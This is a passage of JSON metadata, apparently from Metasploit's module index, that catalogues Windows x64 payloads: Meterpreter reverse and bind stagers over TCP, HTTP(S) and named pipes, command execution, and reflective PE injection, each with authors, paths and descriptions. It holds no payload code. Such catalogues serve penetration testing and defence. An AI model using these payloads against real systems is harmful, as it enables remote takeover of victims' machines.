"2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/exec": { - "name": "Windows x64 Execute Command", - "fullname": "payload/windows/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Execute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/exec.rb", - "is_install_path": true, - "ref_name": "windows/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/loadlibrary": { - "name": "Windows x64 LoadLibrary Path", - "fullname": "payload/windows/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scriptjunkie", - "sf " - ], - "description": "Load an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/loadlibrary.rb", - "is_install_path": true, - "ref_name": "windows/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/messagebox": { - "name": "Windows MessageBox x64", - "fullname": "payload/windows/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "pasta " - ], - "description": "Spawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/messagebox.rb", - "is_install_path": true, - "ref_name": "windows/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter/bind_ipv6_tcp": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/meterpreter/bind_named_pipe": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/meterpreter/bind_tcp": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/meterpreter/bind_tcp_rc4": { - "name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/meterpreter/bind_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/meterpreter/reverse_http": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_windows/x64/meterpreter/reverse_https": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_windows/x64/meterpreter/reverse_named_pipe": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_windows/x64/meterpreter/reverse_tcp": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/meterpreter/reverse_tcp_rc4": { - "name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/meterpreter/reverse_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/meterpreter/reverse_winhttp": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_windows/x64/meterpreter/reverse_winhttps": { - "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_windows/x64/meterpreter_bind_named_pipe": { - "name": "Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/windows/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_bind_tcp": { - "name": "Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/windows/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_reverse_http": { - "name": "Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/windows/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_reverse_https": { - "name": "Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/windows/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_reverse_ipv6_tcp": { - "name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/windows/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/meterpreter_reverse_tcp": { - "name": "Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/windows/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/x64/peinject/bind_ipv6_tcp": { - "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/peinject/bind_named_pipe": { - "name": "Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "UserExistsError" - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/peinject/bind_tcp": { - "name": "Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ege ", - "sf " - ], - "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data 